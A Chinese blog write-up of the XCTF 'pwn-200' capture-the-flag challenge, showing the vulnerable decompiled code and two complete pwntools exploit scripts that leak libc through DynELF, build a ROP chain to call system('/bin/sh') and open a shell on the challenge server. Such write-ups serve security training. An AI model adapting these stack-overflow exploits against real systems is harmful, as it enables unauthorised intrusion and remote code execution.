攻防世界pwn——pwn-200

最新推荐文章于 2023-05-30 22:43:42 发布
最新推荐文章于 2023-05-30 22:43:42 发布
阅读量395 收藏 3
点赞数
分类专栏: PWN 文章标签: 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62076255/article/details/128418144
版权

题目链接:攻防世界 (xctf.org.cn)

文件分析

 文件本身也很简单

int __cdecl main()
{
  char buf[108]; // [esp+2Ch] [ebp-6Ch] BYREF

  strcpy(buf, "Welcome to XDCTF2015~!\n");
  memset(&buf[24], 0, 0x4Cu);
  setbuf(stdout, buf);
  write(1, buf, strlen(buf));
  sub_8048484();
  return 0;
}
ssize_t sub_8048484()
{
  char buf[108]; // [esp+1Ch] [ebp-6Ch] BYREF

  setbuf(stdin, buf);
  return read(0, buf, 0x100u);
}

这里的read存在栈溢出,溢出点找到了下面是构造rop链。但是题目没有给libc文件,一种方法是根据文件去查libc,然后从官方下载对应的libc版本,还有一种就是利用pwntools里的DynELF,下面是DynELF利用的模板

leak得基本构造思路为:112*'A'+write_plt+(漏洞存在得函数的地址,便于反复利用)+1(write的第一个参数)+address(leak函数的参数,给DyELF使用)+4(write的参数,打印8位地址使用)

def leak(address):
    payload='A'*junk+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4) #junk是溢出需要的字节
    #write(1,address,4)表示将address向外写
    r.send(payload)
    data = r.recv(4)
    print(data)
    return data

dyn=DynELF(leak,elf=ELF('./pwn200'))#调用DynELF

sys_addr = dyn.lookup('system',libc)
print('system address:',hex(sys_addr))

 还需要找pop的地址

ROPgadget --binary ./1 --only "pop|ret"

exp

整体的rop链,先利用DynELF泄露system的libc地址。然后控制程序到start函数恢复一下栈,利用read将'/bin/sh'写到bss段,read有三个参数所以返回前需要pop三次调整栈平衡,然后返回的地址覆盖为system,传入参数'/bin/sh'

from pwn import *
context(log_level='debug',arch='i386',os='linux')

r=remote("61.147.171.105",57743)

start_addr=0x80483d0 #satrt的地址
func_addr=0x8048484 #有栈溢出漏洞函数的地址
elf=ELF("./1")
write_plt=elf.symbols['write']
read_plt=elf.symbols['read']

def leak(address):
    payload='A'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4)
    r.send(payload)
    data=r.recv(4)
    print(data)
    return data
print r.recv()
dyn=DynELF(leak,elf=ELF('./1'))
sys_addr=dyn.lookup("system",'libc')
print("system address:",hex(sys_addr))

payload1='A'*112+p32(start_addr) #调用start函数恢复栈
r.send(payload1)
r.recv()

ppp_addr=0x080485cd #0x0804856c,0x080485cd
bss_addr=elf.bss()
payload2 ='A'*112+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(sys_addr)+p32(func_addr)+p32(bss_addr)

r.send(payload2)
r.send('/bin/sh')
r.interactive()

另一种不需要start清栈的exp,read函数的三个参数中的前两个可以和system函数的返回地址和参数相吻合,就不用清栈了

from pwn import *
context(log_level='debug',arch='i386',os='linux')

r=remote("61.147.171.105",57743)

start_addr=0x80483d0
func_addr=0x8048484
elf=ELF("./1")
write_plt=elf.symbols['write']
read_plt=elf.symbols['read']

def leak(address):
    payload='A'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4)
    r.send(payload)
    data=r.recv(4)
    print(data)
    return data
print r.recv()
dyn=DynELF(leak,elf=ELF('./1'))
sys_addr=dyn.lookup("system",'libc')
print("system address:",hex(sys_addr))

bss_addr=elf.bss()
payload2='A'*112+p32(read_plt)+p32(sys_addr)+p32(0)+p32(bss_addr)+p32(8)
r.send(payload2)
r.send('/bin/sh')
r.interactive()

Lyrisฅ
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界XCTF新手区pwn
weixin_45948183的博客
03-24 672
0x00get_shell 第一个比较简单,直接看IDA里面的源码,da进入main函数查看,有system和bin/sh 直接nc连接就可以拿到flag 0x01CGfsb 先看一下保护机制 IDA里面看一下 可以看出当pwnme=8,就可以拿到flag,然后怎么使pwnme=8呢? 可以看出printf哪里存在格式化字符漏洞,由于printf()函数使用不当,造成任意内存读写,通常使用%...
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2022
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3697
攻防世界-Pwn-new-easypwn
攻防世界 pwnstack writeup
m0_73605862的博客
05-30 821
Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762。Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2170
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
攻防世界pwn200
qq_25044201的博客
01-17 235
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
攻防世界 pwn-200
winterze的博客
04-04 628
攻防世界 pwn-200 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/pwn/pwn-200' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8...
攻防世界 pwn200 WP
Zarcs_233的博客
01-28 439
32位栈溢出程序 具体思路(ROP): 1.搞到system函数地址,可以通过dynelf 2.写入’/bin/sh’,用做system参数 3.调用system函数 EXP: from pwn import * context.log_level='debug' p=remote("111.198.29.45",30502) start=0x80483D0 #程序起始代码,实现复用 def...
攻防世界pwn难度1
weixin_63282980的博客
11-05 1621
攻防世界难度1的题目WP
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2935
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
pwn-200(xctf)
weixin_43868725的博客
08-08 597
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
攻防世界 pwn新手区 wp
Gtooler的博客
10-07 453
get-shell 此题是经典入门题,没有设置任何漏洞,直接给了shell 直接nc连上,然后ls,最后cat flag即可 hello_pwn 发现只要让dword_60106C == 1853186401就可以拿到flag read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存 计算距离为4,写个exp即可 from pwn import * p = remote('111.200.241.244', '56851') p.recvu
攻防世界PWN新手练习区WP
Du3t
09-28 1344
近期笨逼菜鸡开始接触PWN 刷了刷攻防世界的题目 在这里记录下自己的学习成果 CGfsb 首先是PWN题的常规起手式 查壳查保护 捎带着看下程序信息 发现无壳 但是存在Canary保护和NX保护 这里先讲一下什么是Canary保护 Canary保护主要是用来防护栈溢出的 在开启Canary保护程序调用函数的时候 会在栈中压入一个随机Canary值 在函数结束的时候程序会判断Canary值是...
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值